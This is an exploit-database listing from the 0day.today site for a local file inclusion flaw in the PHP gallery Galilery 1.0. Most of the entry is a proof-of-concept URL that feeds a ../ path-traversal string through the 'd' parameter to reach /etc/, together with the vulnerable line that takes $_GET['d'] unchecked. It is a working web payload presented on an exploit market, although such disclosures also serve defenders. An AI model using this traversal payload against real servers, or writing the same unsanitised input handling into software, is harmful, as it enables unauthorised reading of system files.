[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Galilery 1.0 Local File Inclusion Vulnerability

Author
lemlajt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15437
Category
web applications
Date add
22-02-2011
Platform
php
# exploit title: local file include in Galilery 1.0
# date: 18.o2.2o11
# author: lemlajt
# software : Galilery
# version: 1.0
# tested on: linux
# cve :
# http://ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/
 
 
PoC :
 
http://localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/
 
cuz:
index.php: $d=$_GET['d'];



#  0day.today [2024-11-16]  #